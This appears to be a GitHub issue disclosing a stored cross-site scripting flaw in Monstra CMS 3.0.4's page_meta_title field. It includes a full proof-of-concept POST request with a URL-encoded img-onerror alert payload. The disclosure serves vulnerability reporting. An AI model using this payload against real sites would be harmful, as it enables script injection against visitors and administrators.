search

monstra-cms / monstra

THIS PROJECT IS NOT SUPPORTED ANYMORE! Check FLEXTYPE.ORG
http://flextype.org
MIT License
396 stars 123 forks source link

Stored XSS in Monstra CMS 3.0.4 #458

Open PrincyEdward opened 5 years ago

PrincyEdward commented 5 years ago

Monstra - Version 3.0.4

Exploit URI : http://localhost/path/admin/index.php?id=pages&action=add_page http://localhost/path/admin/index.php?id=pages&action=edit_page&name=

Parameter -> page_meta_title

POC:

POST /path/admin/index.php?id=pages&action=edit_page&name=aaaa HTTP/1.1 Host: localhost User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:61.0) Gecko/20100101 Firefox/61.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Referer: http://localhost/path/admin/index.php?id=pages&action=edit_page&name=aaaa Content-Type: application/x-www-form-urlencoded Content-Length: 460 Cookie: admin_username=admin; PHPSESSID=68m15vretbrdhhfa2ac19nqe17; Connection: close Upgrade-Insecure-Requests: 1

csrf=8a49185957df40c6b8bb8b3595663dedc3ffcb19&page_old_name=aaaa&old_parent=home&page_id=5&page_title=sample&page_name=sample&page_meta_title=prince%22%3E%3Cimg+src%3Dx+onerror%3Dalert%281%29%3E&page_keywords=&page_description=&pages=home&templates=index&status=published&access=public&editor=&page_tags=&edit_page_and_exit=Save+and+Exit&page_date=2018-09-12+16%3A34%3A54